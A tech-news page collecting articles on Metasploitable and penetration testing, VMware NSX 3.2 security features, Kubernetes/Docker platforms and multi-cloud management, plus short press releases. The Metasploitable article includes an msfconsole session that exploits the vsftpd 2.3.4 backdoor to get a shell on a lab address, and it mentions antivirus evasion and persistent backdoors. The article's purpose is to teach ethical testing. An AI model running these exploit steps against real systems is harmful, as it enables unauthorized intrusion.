Use Microsoft Azure Virtual Machines to run large-scale parallel MATLAB workloads

MATLAB® is a hugely popular platform used by engineers and scientists to analyze data and design systems and products. Users with large-scale simulations and data analytics tasks can use MathWorks parallel computing products to speed up and scale these workloads by taking advantage of multi-core processors, GPU acceleration, and compute clusters. To create clusters, MATLAB Distributed Computing Server™ runs on the cluster nodes and includes a built-in job scheduler that supports batch jobs, parallel computations, and distributed large data.

Spotlight

Wavefront® by VMware

Wavefront is the ultimate metrics monitoring service for cloud and modern application environments. Its observability and analytics tools enable DevOps functions at SaaS companies where power, scale, performance, and reliability are essential to their business.

OTHER ARTICLES
Virtual Desktop Tools, Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | April 28, 2023

Contents
1. Overview
2. Ethical Hacking and Penetration Testing
3. Metasploit Penetration Test
4. Why Choose Metasploit Framework for Your Business?
5. Closing Remarks

1. Overview

Metasploitable is an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit. Metasploit is one of the best-known penetration testing frameworks; it helps businesses discover and shore up their systems' vulnerabilities before hackers exploit them. Security engineers use Metasploit both as a penetration testing system and as a development platform for creating security tools and exploits. Metasploit's various user interfaces, libraries, tools, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it at the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options.

2. Ethical Hacking and Penetration Testing

An ethical hacker works within a security framework and checks for bugs that a malicious hacker might use to exploit networks, applying their experience and skills to keep the cyber environment secure. Ethical hacking is essential for protecting infrastructure from the threats that hackers pose. The main purpose of an ethical hacking engagement is to assess the safety of the targeted systems and networks and report the findings to the owner. Ethical hacking is performed with penetration testing techniques to evaluate security loopholes, such as:

- Information gathering
- Vulnerability scanning
- Exploitation
- Test analysis

Ethical hacking relies heavily on automated methods; hacking without automated software is inefficient and time-consuming. Several tools and frameworks support ethical hacking and penetration testing.
The Metasploit framework eases the effort to exploit vulnerabilities in networks, operating systems, and applications, and supports developing new exploits for new or unknown vulnerabilities.

3. Metasploit Penetration Test

Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spot in the system.

Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and payload for penetration.

Exploitation: If the exploit (a tool used to take advantage of a system weakness) is successful, the payload gets executed at the target, and the user gets a shell for interacting with the payload (a shellcode is a small piece of code used as the payload). The most popular payload for attacking Windows systems is Meterpreter, an in-memory-only interactive shell that lets the attacker explore the target machine and execute code. Other payload types are:

- Static payloads (enable port forwarding and communication between networks)
- Dynamic payloads (allow testers to generate unique payloads to evade antivirus software)
- Command shell payloads (enable users to run scripts or commands against a host)

Post-Exploitation: Once on the target machine, Metasploit offers various tools for privilege escalation, packet sniffing, keylogging, screen capture, and pivoting.

Resolution and Re-Testing: Users can set up a persistent backdoor that survives reboots of the target machine. These features make Metasploit easy to configure to the user's requirements.

4. Why Choose Metasploit Framework for Your Business?

Significant advantages of the Metasploit Framework are discussed below:

Open source: Metasploit Framework is actively developed as open-source software, so many companies prefer it as they grow their businesses.

Easy usage: It is very easy to use, with simple naming conventions for its commands.
This also facilitates building extensive penetration tests across the network.

GUI Environment: It provides friendly third-party GUI interfaces that ease penetration testing projects with facilities such as button-click actions, on-the-fly vulnerability management, and easy-to-switch workspaces, among others.

Cleaner Exits: Metasploit can exit cleanly without detection, even if the target system does not restart after a penetration test. Additionally, it offers various options for maintaining persistent access to the target system.

Easy Switching Between Payloads: Metasploit allows testers to change payloads easily with the 'set payload' command. It offers flexibility for system penetration through shell-based access or Meterpreter.

5. Closing Remarks

From DevSecOps experts to hackers, everyone uses the Ruby-based open-source framework Metasploit, which allows testing via command-line alterations or a GUI, and Metasploitable is the vulnerable virtual machine ideally suited for practicing ethical hacking and penetration testing on VMs. One trend likely to shape the future of Metasploitable is the increasing use of cloud-based environments for testing and production: Metasploitable could be adapted to work in cloud environments, or new tools may be developed specifically for cloud-based penetration testing. Another is the growing importance of automation in security testing; Metasploitable could be adapted to include more automation features. The future of Metasploitable looks bright as it continues to be a valuable tool for security professionals and enthusiasts. As the security landscape evolves, it will be interesting to see how Metasploitable adapts to the community's changing needs.
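The exploit-payload workflow described above can be illustrated with a minimal msfconsole session. This is a sketch for a lab setup only: the module shown (the vsftpd 2.3.4 backdoor commonly practiced against Metasploitable 2) exists in the framework, but the IP address is a placeholder for a machine on your own isolated test network.

```text
msf6 > search vsftpd                          # reconnaissance: find a module for a known-vulnerable service
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101   # placeholder: your Metasploitable VM
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads               # list compatible payloads
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run                         # a command shell session opens on success
```

The same 'set payload' step is what makes switching between shell-based access and Meterpreter a one-line change.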

Read More
Server Hypervisors

VMware NSX 3.2 Delivers New, Advanced Security Capabilities

Article | September 9, 2022

It’s an impactful release focused on significant NSX Security enhancements.

Putting a hard shell around a soft core is not a recipe for success in security, but somehow legacy security architectures for application protection have often looked exactly like that: a hard perimeter firewall layer for an application infrastructure that was fundamentally not built with security as a primary concern. VMware NSX Distributed Firewall pioneered the micro-segmentation concept for granular access controls for cloud applications with the initial launch of the product in 2013. The promise of Zero Trust security for applications, the simplicity of deployment of the solution, and the ease of achieving internal security objectives made NSX an instant success for security-sensitive customers. Our newest release — NSX-T 3.2 — establishes a new marker for securing application infrastructure by introducing significant new features to identify and respond to malware and ransomware attacks in the network, to enhance user identification and L7 application identification capabilities, and, at the same time, to simplify deployment of the product for our customers.

“Modern-day security teams need to secure mission-critical infrastructure from both external and internal attacks. By providing unprecedented threat visibility leveraging IDS, NTA, and Network Detection and Response (NDR) capabilities along with granular controls leveraging L4-L7 Firewall, IPS, and Malware Prevention capabilities, NSX 3.2 delivers an incredible security solution for our customers,” said Umesh Mahajan, SVP and GM, Networking and Security Business Unit.

Distributed Advanced Threat Prevention (ATP)

Attackers often use multiple sophisticated techniques to penetrate the network, move laterally within the network in a stealthy manner, and exfiltrate critical data at an appropriate time.
Micro-segmentation solutions focused solely on access control can reduce the attack surface — but cannot provide the detection and prevention technologies needed to thwart modern attacks. NSX-T 3.2 introduces several new capabilities focused on detection and prevention of attacks inside the network. Of critical note is that these advanced security solutions do not need network taps, separate monitoring networks, or agents inside each and every workload.

Distributed Malware Prevention

Lastline’s highly reputed dynamic malware technology is now integrated with NSX Distributed Firewall to deliver an industry-first Distributed Malware Prevention solution. Leveraging the integration with Lastline, a Distributed Firewall embedded within the hypervisor kernel can now identify both “known malicious” as well as “zero day” malware.

Distributed Behavioral IDS

Whereas earlier versions of NSX Distributed IDPS (Intrusion Detection and Prevention System) delivered primarily signature-based detection of intrusions, NSX 3.2 introduces “behavioral” intrusion detection capabilities as well. Even if specific IDS signatures are not triggered, this capability helps customers know whether a workload is seeing any behavioral anomalies, like DNS tunneling or beaconing, that could be a cause for concern.

Network Traffic Analysis (NTA)

For customers interested in baselining network-wide behavior and identifying anomalous behavior at the aggregated network level, NSX-T 3.2 introduces Distributed Network Traffic Analysis (NTA). Network-wide anomalies like lateral movement, suspicious RDP traffic, and malicious interactions with the Active Directory server can alert security teams about attacks underway and help them take quick remediation actions.

Network Detection and Response (NDR)

Alert overload, and the resulting fatigue, is a real challenge among security teams.
Leveraging advanced AI/ML techniques, the NSX-T 3.2 Network Detection and Response solution consolidates security IOCs from different detection systems (IDS, NTA, malware detection, etc.) to provide a “campaign view” that shows specific attacks in play at that point in time. MITRE ATT&CK visualization helps customers see the specific stage in the kill chain of individual attacks, and the “time sequence” view helps them understand the sequence of events that contributed to the attack on the network.

Key Firewall Enhancements

While delivering new Advanced Threat Prevention capabilities is one key emphasis for the NSX-T 3.2 release, providing meaningful enhancements for core firewalling capabilities is an equally critical area of innovation.

Distributed Firewall for VDS Switchports

While NSX-T has thus far supported workloads connected to both overlay-based N-VDS switchports as well as VLAN-based switchports, customers had to move the VLAN switchports from VDS to N-VDS before a Distributed Firewall could be enforced. With NSX-T 3.2, native VLAN DVPGs are supported as-is, without having to move to N-VDS. Effectively, Distributed Security can be achieved in a completely seamless manner without having to modify any networking constructs.

Distributed Firewall Workflows in vCenter

With NSX-T 3.2, we are introducing the ability to create and modify Distributed Firewall rules natively within vCenter. For small- to medium-sized VMware customers, this feature simplifies the user experience by eliminating the need to use a separate NSX Manager interface.

Advanced User Identification for Distributed and Gateway Firewalls

NSX supported user identity-based access control in earlier releases. With NSX-T 3.2, we’re introducing the ability to connect directly to Microsoft Active Directory to support user identity mapping.
In addition, for customers who do not use Active Directory for user authentication, NSX also supports VMware vRealize LogInsight as an additional method to carry out user identity mapping. This feature enhancement is applicable to both the NSX Distributed Firewall and the NSX Gateway Firewall.

Enhanced L7 Application Identification for Distributed and Gateway Firewalls

NSX supported Layer-7 application identification-based access control in earlier releases. With NSX-T 3.2, we are enhancing the signature set to about 750 applications. While several perimeter firewall vendors claim a larger set of Layer-7 application signatures, they focus mostly on internet application identification (like Facebook, for example). Our focus with NSX at this time is on internal applications hosted by enterprises. This feature enhancement is applicable to both the NSX Distributed Firewall and Gateway Firewalls.

NSX Intelligence

NSX Intelligence is geared towards delivering unprecedented visibility for all application traffic inside the network and enabling customers to create micro-segmentation policies to reduce the attack surface. It has a processing pipeline that de-dups, aggregates, and correlates East-West traffic to deliver in-depth visibility.

Scalability Enhancements for NSX Intelligence

As application infrastructure grows rapidly, it is vital that one’s security analytics platform can grow with it. With the new release, we have rearchitected the application platform upon which NSX Intelligence runs — moving from a stand-alone appliance to a containerized micro-service architecture powered by Kubernetes. This architectural change future-proofs the Intelligence data lake and allows us to eventually scale out our solution to n-node Kubernetes clusters. Large enterprise customers that need visibility for application traffic can confidently deploy NSX Intelligence and leverage the enhanced scale it supports.
NSX Gateway Firewall

While NSX Distributed Firewall focuses on east-west controls within the network, NSX Gateway Firewall is used for securing ingress and egress traffic into and out of a zone.

Gateway Firewall Malware Detection

NSX Gateway Firewall in the 3.2 release received significant Advanced Threat Detection capabilities. Gateway Firewall can now identify both known as well as zero-day malware ingressing or egressing the network. This new capability is based on the Gateway Firewall integration with Lastline’s highly reputed dynamic network sandbox technology.

Gateway Firewall URL Filtering

Internal users and applications reaching out to malicious websites is a huge security risk that must be addressed. In addition, enterprises need to limit internet access to comply with corporate internet usage policies. NSX Gateway Firewall in 3.2 introduces the capability to restrict access to internet sites. Access can be limited based on either the category the URL belongs to, or the “reputation” of the URL. The URL-to-category and reputation mapping is constantly updated by VMware so customer intent is enforced automatically even after many changes in the internet sites themselves.
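To make the micro-segmentation model concrete, here is a sketch of how a Distributed Firewall rule can be expressed declaratively through the NSX Policy REST API. The manager hostname, group paths, and policy name are illustrative placeholders, and the exact request shape should be verified against the NSX-T API reference for your release.

```text
# Allow only HTTPS from the "web" group to the "app" group; a default-deny policy handles the rest
PATCH https://nsx-mgr.example.com/policy/api/v1/infra/domains/default/security-policies/web-to-app
{
  "display_name": "web-to-app",
  "category": "Application",
  "rules": [
    {
      "display_name": "allow-https",
      "source_groups": ["/infra/domains/default/groups/web"],
      "destination_groups": ["/infra/domains/default/groups/app"],
      "services": ["/infra/services/HTTPS"],
      "action": "ALLOW"
    }
  ]
}
```

Because the rule is enforced by the Distributed Firewall at each workload's virtual NIC, the same intent applies wherever the VMs run, without hairpinning traffic through a perimeter appliance.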

Read More
VMware, vSphere, Hyper-V

Boosting Productivity with Kubernetes and Docker

Article | May 2, 2023

Learn how to set up a Docker and Kubernetes environment with the right considerations, and choose the best-suited software for your business needs from ten leading tools and platforms.

This blog discusses how Kubernetes and Docker can boost software development and deployment productivity. In addition, it covers the role of Kubernetes in orchestrating containerized applications and best practices for implementing these technologies to improve efficiency and streamline workflows. Docker and Kubernetes are both essential containerization ecosystem utilities. Kubernetes, an excellent DevOps solution, manages and automates the deployment and scaling of containers and operates across clusters of hosts, whereas Docker is used for creating and operating containers. The blog covers tips to consider while choosing tools and platforms, then lists ten platforms providing Kubernetes and Docker, featuring their offerings.

1. Considerations While Setting Up a Development Environment with Kubernetes and Docker

1.1 Fluid app delivery

A platform for application development must provide development teams with high velocity. Two factors contribute to high velocity: rapid application delivery and brief development cycles. Application platforms must support build processes that start with source code. The platforms must also facilitate the repetitive deployment of applications on any remote staging instance.

1.2 Polyglot support

Consistency is the defining characteristic of an application platform. On-demand, repetitive, and reproducible builds must be supported by the platform. Extending a consistent experience across all languages and frameworks elevates the platform experience. The platform must support a native build process along with the ability to develop and customize this build process.

1.3 Baked-in security

Containerized environments are secured in a significantly different manner than conventional applications.
A fundamental best practice is to utilize binaries compiled with all necessary dependencies. The build procedure should also include a directive to eliminate components unnecessary for the application's operation. Setting up a zero-trust architecture between the platform components that orchestrate deployments significantly improves the workloads' security posture.

1.4 Adjustable abstractions

A platform with paved paths and the flexibility to accommodate the requirements of software engineering teams has a greater chance of success. Open-source platforms score highly in this regard, particularly those with modular architectures that allow the team to swap out parts as they adjust.

2. Top Tips to Consider While Choosing Tools and Platforms for Kubernetes and Docker

2.1 Production-Readiness

Configuring Kubernetes or Docker can be complex and resource-intensive. A production-ready platform ensures the necessary fully automated features are available without extra configuration. Security is an essential aspect of production readiness. Additionally, automation is critical, as production readiness requires that the solution manage all cluster management duties. Automated backup, recovery, and restore capabilities must be considered. Also, ensure the platform provides high availability, scalability, and self-healing for the cluster.

2.2 Future-Readiness

As the cloud and software evolve, a system's hosting location may affect its efficacy. The current trend is a multi-cloud strategy. Ensure that the platform can support abstracting away from cloud or data center providers and building a shared infrastructure across clouds, cloud regions, and data centers, as well as assist in configuring them if required. According to a recent study by Microsoft and 451 Research, nearly one-third of organizations already work with four or more cloud service providers.

2.3 Ease of Administration

Managing a Docker or Kubernetes cluster is complex and requires various skill sets.
Kubernetes generates a lot of unprocessed data, which must be interpreted to understand what's happening with the cluster. Early detection and intervention are crucial to disaster prevention. Identifying a platform that eliminates the burden of analyzing raw data is essential. By incorporating automated intelligent monitoring and alerts, such solutions surface critical status, error, event, and warning data so that appropriate action can be taken.

2.4 Assistance and Training

As the organization begins to acquire Kubernetes or Docker skills, it is essential to have a vendor that can provide 24/7 support and training to ensure a seamless transition. Incorrect implementation will add a layer of complexity to infrastructure management. Leverage automation tools that offer the support needed to use Kubernetes and Docker without the management burden.

3. 10 Tools and Platforms Providing Kubernetes and Docker

3.1 Aqua Cloud Native Security Platform

Aqua Security provides the Aqua Cloud Native Security Platform, a comprehensive security solution designed to protect cloud-native applications and microservices. Aqua offers end-to-end security for applications operating on Docker Enterprise Edition (Community Edition), protecting the DevOps pipeline and production workloads with complete visibility and control. It provides end-to-end security across the entire application lifecycle, from development to production, for both containerized and serverless workloads. In addition, it automates prevention, detection, and response across the whole application lifecycle to secure the build, cloud infrastructure, and operating workloads, regardless of where they are deployed.

3.2 Weave GitOps Enterprise

Weave GitOps Enterprise, a full-stack, developer-centric operating model for Kubernetes, creates and contributes to several open-source projects. Its products and services enable teams to design, build, and operate their Kubernetes platform at scale.
Built by the creators of Flux and Flagger, Weave GitOps allows users to deploy and manage Kubernetes clusters and applications in the public or private cloud or their own data center. Weave GitOps Enterprise helps simplify Kubernetes with fully automated continuous delivery pipelines that roll out changes from development to staging and production. Weaveworks has used Kubernetes in production for over eight years and has distilled that expertise into Weave GitOps Enterprise.

3.3 Mirantis Kubernetes Engine

Mirantis provides the Mirantis Kubernetes Engine, a platform designed to help organizations deploy, manage, and scale their Kubernetes clusters. It includes features such as container orchestration, automated deployment, monitoring, and high availability, all designed to help organizations build and run their applications at scale. Mirantis Kubernetes Engine also includes a set of tools for managing the lifecycle of Kubernetes clusters, including cluster deployment, upgrades, and patching. It also has security scanning and policy enforcement features, as well as integration with other enterprise IT systems such as Active Directory and LDAP.

3.4 Portworx by Pure Storage

Portworx's deep integration into Docker gives Portworx container data services benefits directly through the Docker Swarm scheduler. Swarm service creation brings the management capability of Portworx to the Docker persistent storage layer, avoiding complex tasks such as increasing the storage pool without container downtime and problems like stuck EBS drives. Portworx is also a multi-cloud-ready Kubernetes storage and administration platform designed to simplify and streamline data management in Kubernetes. The platform abstracts away the complexity of data storage in Kubernetes. Additionally, it serves as a software-defined layer that aggregates Kubernetes nodes' data storage into a virtual reservoir.
3.5 Platform9

Platform9 provides a powerful IDE for developers with simplified in-context views of pods, logs, events, and more. Both development and operations teams can access the information they need in an instant, secured through SSO and Kubernetes RBAC. The industry’s first SaaS-managed approach, combined with a best-in-class support and customer success organization with a 99.9% consistent CSAT rating, delivers production-ready Kubernetes to organizations of any size. It provides services to deploy a cluster instantly, achieve GitOps faster, and take care of every aspect of cluster management, including remote monitoring, self-healing, automatic troubleshooting, and proactive issue resolution, around the clock.

3.6 Kubernetes Network Security

Sysdig provides Kubernetes Network Security, a solution that offers cloud security from source to run. The product provides network security for Kubernetes environments by monitoring and blocking suspicious traffic in real time, helping organizations protect their Kubernetes clusters against advanced threats and attacks. The product and Sysdig Secure offer Kubernetes Network Monitoring to investigate suspicious traffic and connection attempts, Kubernetes-Native Microsegmentation to enable microsegmentation without breaking the application, and Automated Network Policies to save time by automating Kubernetes network policies.

3.7 Kubernetes Operations Platform for Edge

Rafay delivers a production-ready Kubernetes Operations Platform for Edge, streamlining ongoing operations for edge applications. It provides centralized multi-cluster management to deploy, manage, and upgrade all Kubernetes clusters from a single console across all edge nodes. In addition, it offers comprehensive lifecycle management, with which users can quickly and easily provision Kubernetes clusters at the edge, where cluster updates and upgrades are seamless with no downtime.
Furthermore, the KMC for Edge quickly integrates with enterprise-class SSO solutions such as Okta, Ping One, and Azure AD, among others. Other features include standardized clusters and workflows, integration and automation, and centralized logging and monitoring.

3.8 Opcito Technologies

Opcito provides simplified container management with efficient provisioning, deployment, scaling, and networking. Its application containerization expertise helps containerize existing and new applications and dependencies. Opcito is well-versed in leading container orchestration platforms like Docker Swarm and Kubernetes. While it helps choose the container platform that best suits specific application needs, it also helps with the end-to-end management of containers so clients can release applications faster and focus on innovation and business. Its container management and orchestration services include building secured microservices, enterprise-scale container management and orchestration, and container monitoring.

3.9 D2iQ Kubernetes Platform (DKP)

D2iQ's DKP enables enterprises to take advantage of all the benefits of cloud-native Kubernetes while laying the groundwork for intelligent cloud-native innovation by simplifying Kubernetes deployment and maintenance. It simplifies and automates the most difficult parts of an enterprise Kubernetes deployment across all infrastructures. DKP helps enterprises easily overcome operational barriers and set up in minutes and hours rather than weeks and months. In addition, DKP simplifies Kubernetes management through automation using GitOps workflows, observability, an application catalog, real-time cost management, and more.

3.10 Spektra

Spektra, by Diamanti, is a multi-cluster management solution for DevOps and production teams. It provides centralized multi-cluster management: a single control plane that delivers everything needed to provision and manage the lifecycle of multiple clusters.
Spektra is built to cater to business needs, from air-gapped on-prem deployments to hybrid and multi-cloud infrastructures. It also enables stretching resources across different clusters within a tenant. Furthermore, it allows moving workloads and their associated data from one cluster to another directly from its dashboard. Spektra integrates with the Lightweight Directory Access Protocol (LDAP) and Active Directory (AD) to enable user authentication and streamline resource access. In addition, it offers application migration, data mobility, and reporting.

4. Conclusion

Kubernetes and Docker can significantly boost software development and deployment productivity. By adopting appropriate containerization platforms and leveraging Kubernetes for orchestration, organizations can streamline workflows, improve efficiency, and enhance the reliability of their applications. Choosing tools and platforms carefully, following the tips above, can improve productivity further.
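As a minimal illustration of the Docker-plus-Kubernetes workflow discussed above, the commands below build an image, deploy it to a cluster, and scale it out. The image name, registry, and ports are hypothetical placeholders; a real setup would add a CI pipeline, health probes, and version pinning.

```text
# Build and push a container image with Docker (registry and tag are placeholders)
docker build -t registry.example.com/team/myapp:1.0 .
docker push registry.example.com/team/myapp:1.0

# Deploy it on Kubernetes, expose it, and scale it across the cluster
kubectl create deployment myapp --image=registry.example.com/team/myapp:1.0
kubectl expose deployment myapp --port=80 --target-port=8080
kubectl scale deployment myapp --replicas=3

# Inspect rollout status and the raw cluster events that monitoring platforms digest for you
kubectl rollout status deployment/myapp
kubectl get events --sort-by=.metadata.creationTimestamp
```

The last two commands show the kind of unprocessed cluster data that the administration tips above recommend delegating to an automated monitoring platform.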

Read More
Virtual Desktop Tools

Managing Multi-Cloud Complexities for a Seamless Experience

Article | July 7, 2022

Introduction

The early 2000s were milestone years for the cloud: Amazon Web Services (AWS) entered the market in 2006, while Google revealed its first cloud service in 2007. Fast forward to 2020, when the pandemic accelerated digital transformation efforts by around seven years (according to McKinsey), and the cloud has become a commercial necessity today. It not only facilitated the swift transition to remote work but also remains critical to maintaining company sustainability and creativity. Many can argue that the large-scale transition to the cloud in the 2010s was necessary to enable the digital-first experiences that remote workers and decentralized businesses need today.

Multi-cloud and hybrid cloud setups are now the norm. According to Gartner, most businesses today use a multi-cloud approach to reduce vendor lock-in or to take advantage of more flexible, best-of-breed solutions. However, managing multi-cloud systems increases cloud complexity and IT concerns, frequently slowing rather than accelerating innovation. According to 2022 research by IntelligentCIO, the average multi-cloud system includes five platforms, including AWS, Microsoft Azure, Google Cloud, and IBM Red Hat, among others.

Managing Multi-Cloud Complexities Like a Pro

Your multi-cloud strategy should satisfy your company's requirements while also laying the groundwork for managing various cloud deployments. Creating a proactive plan for managing multi-cloud setups is one of the practices that can distinguish your company. The strategies for handling multi-cloud complexity are outlined below.

Managing Data with AI and ML

AI and machine learning can help manage the enormous quantities of data in multi-cloud environments. AI simulates human decision-making and performs tasks as well as humans, or at times even better. Machine learning is a type of artificial intelligence that learns from data, recognizes patterns, and makes decisions with minimal human interaction.
AI and ML help discover the most important data, reducing big data and multi-cloud complexity and enabling simpler, better data control.

Integrated Management Structure

Keeping up with the growing number of cloud services from several providers requires a unified management structure. Managing multiple clouds requires IT time, resources, and technology to juggle and correlate infrastructure alternatives. Routinely monitor your cloud resources and service settings: it's important to manage apps, clouds, and people globally, and to ensure you have the technology and infrastructure to handle several clouds.

Developing a Security Strategy

Operating multiple clouds requires a security strategy and seamless integration of security capabilities. There's no single right answer, since vendors have varied policies and cybersecurity methods. Storing data across many cloud deployments helps prevent data loss, so handling backups and safety copies of your data is crucial. Regularly examine your multi-cloud network's security: the cyber threat environment will vary as infrastructure and software do, and multi-cloud strategies must safeguard both data and applications.

Skillset Management

Multi-cloud complexity requires skilled operators. Do you have the appropriate IT personnel to handle multi-cloud? If not, can you use managed or cloud services? These specialists are responsible for teaching the organization how each cloud deployment helps the company accomplish its goals, and for ensuring all cloud entities work properly by utilizing cloud technologies.

Closing Lines

Traditional cloud monitoring solutions are incapable of dealing with dynamic multi-cloud setups, but automated intelligence excels at getting to the heart of cloud performance and security concerns. To begin with, businesses require end-to-end observability in order to see the overall picture.
Add automation and causal AI to this capacity, and teams can obtain the accurate answers they require to better optimize their environments, freeing them up to concentrate on increasing innovation and generating better business results.
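As an illustration of the unified management structure described above, the sketch below aggregates resource inventories from several clouds behind one provider-agnostic interface. It is a minimal, purely illustrative model: the adapter classes, resource names, and cost figures are hypothetical stand-ins, not real AWS or Azure SDK calls; a production version would back each adapter with the vendor's own API.

```python
from dataclasses import dataclass

@dataclass
class Resource:
    provider: str       # e.g. "aws", "azure"
    kind: str           # e.g. "vm", "bucket"
    name: str
    monthly_cost: float

class CloudAdapter:
    """Provider-agnostic interface; real adapters would wrap vendor SDKs."""
    def list_resources(self):
        raise NotImplementedError

class FakeAWS(CloudAdapter):
    """Hypothetical stand-in for an AWS-backed adapter."""
    def list_resources(self):
        return [Resource("aws", "vm", "web-1", 70.0),
                Resource("aws", "bucket", "logs", 5.0)]

class FakeAzure(CloudAdapter):
    """Hypothetical stand-in for an Azure-backed adapter."""
    def list_resources(self):
        return [Resource("azure", "vm", "db-1", 120.0)]

def inventory(adapters):
    """Merge all providers into one view, totaling spend per provider."""
    totals = {}
    for adapter in adapters:
        for res in adapter.list_resources():
            totals[res.provider] = totals.get(res.provider, 0.0) + res.monthly_cost
    return totals

print(inventory([FakeAWS(), FakeAzure()]))  # {'aws': 75.0, 'azure': 120.0}
```

The design point is the single `inventory` view: once every provider sits behind the same interface, routine monitoring and cost correlation happen in one place instead of per console.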


Related News

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in data center applications. The newly launched IP series caters to the advanced requirements of next generation data centers, including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and supports all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with a low memory footprint and low encoding latency. Capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieving an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this IP series also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. 
We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.”

About VeriSilicon

VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.


Server Virtualization

Panasonic Automotive Introduces Neuron High-Performance Compute (HPC) to Advance to a Software-Defined Mobility Future

PR Newswire | January 09, 2024

Panasonic Automotive Systems Company of America, a tier-one automotive supplier and a division of Panasonic Corporation of North America, announced its High-Performance Compute (HPC) system. Named Neuron, this innovation addresses the rapidly evolving mobility needs anticipated for software-defined vehicle advancements. As vehicles become more software reliant, vehicle systems must support the extended software lifecycle by enabling software upgrades and prolonging the supporting hardware capability. Cars rely on hardware and software compute platforms to process, share, sense, and derive insights to handle functions for assisted driving. Panasonic Automotive's Neuron HPC allows for not only software updates and upgrades but also hardware upgrades across platform lifecycles. The Neuron HPC can aggregate multiple computing zones to reduce the cost, weight, and integration complexity of the vehicle by removing redundant components. Panasonic Automotive's design supports effortless up-integration with high-performance and heavy data input processing capability. Importantly, the design is upgradeable, scalable, and future-proof across today's evolving in-vehicle platforms.

Neuron HPC Architecture & Design

Panasonic Automotive's High-Performance Compute architecture could reduce the number of distributed electronic control units (ECUs) by up to 80%, allowing for faster, lighter, cross-domain computing for real-time, cross-functional communications. The Neuron HPC design is suited for any mobility platform, including internal combustion engine, hybrid, fuel cell, or electric vehicles. "In collaboration with OEMs, Panasonic Automotive has designed and met some of the largest central compute platform challenges in the industry in order to make the driving experience evolve with technology," said Andrew Poliak, CTO, Panasonic Automotive Systems Company of America. 
"Neuron maximizes performance, safety and innovation over the entire ownership of the consumer's vehicle and enables OEMs with a future-proof SDV platform for ensuing generations of mobility needs."

Key Systems, UX Features & Technical Benefits

With a streamlined design, the Neuron HPC incorporates up-integration capability by consolidating multiple ECUs into one centralized nucleus to handle all levels of ADAS, chassis, body, and in-cabin infotainment features.

About Panasonic Automotive Systems Company of America

Panasonic Automotive Systems Company of America is a division of Panasonic Corporation of North America and a leading global supplier of automotive infotainment and connectivity system solutions. It acts as the North American affiliate of Panasonic Automotive Systems Co., Ltd., which coordinates global automotive. Panasonic Automotive Systems Company of America is headquartered in Peachtree City, Georgia, with sales, marketing and engineering operations in Farmington Hills, Mich.

About Panasonic Corporation of North America

Newark, NJ-based Panasonic Corporation of North America is committed to creating a better life and a better world by enabling its customers through innovations in Sustainable Energy, Immersive Entertainment, Integrated Supply Chains and Mobility Solutions. The company is the principal North American subsidiary of Osaka, Japan-based Panasonic Corporation. One of Interbrand's Top 100 Best Global Brands of 2023, Panasonic is a leading technology partner and integrator to businesses, government agencies and consumers across the region.


Server Virtualization

AELF Partners with ChainsAtlas to Pioneer Interoperability in Blockchain

PR Newswire | January 09, 2024

aelf is advancing cross-chain interoperability through a strategic partnership with ChainsAtlas. By utilising ChainsAtlas' innovative virtualisation technology, aelf will enable decentralised applications (dApps) from diverse blockchains to seamlessly migrate and integrate into the aelf blockchain, regardless of the dApps' smart contract specifications. This collaboration marks a significant step towards a globally interconnected and efficient blockchain ecosystem, breaking down the silos between blockchains. Khaniff Lau, Business Development Director at aelf, shares, "The strategic partnership with ChainsAtlas is a significant step towards realising our vision of a seamlessly interconnected blockchain world. With this integration, aelf is set to become a hub for cross-chain activities, enhancing our ability to support a wide array of dApps, digital assets, and Web2 apps. This collaboration is not just about technology integration; it's about shaping the future of how services and products on blockchains interact and operate in synergy." Jan Hanken, Co-founder of ChainsAtlas, says, "ChainsAtlas was always built to achieve two major goals: to make blockchain development accessible to a broad spectrum of developers and entrepreneurs and, along that path, to pave the way for a truly omnichain future." "By joining forces with aelf, we are bringing that visionary future much closer to reality. As we anticipate the influx of creativity from innovators taking their first steps into the world of Web3 on aelf, driven by ChainsAtlas technology, we are excited to see these groundbreaking ideas come to life," adds Hanken. The foundation for true cross-chain interoperability is being built as aelf integrates ChainsAtlas' Virtualization Unit (VU), enabling the aelf blockchain to accommodate both EVM and non-EVM digital assets. 
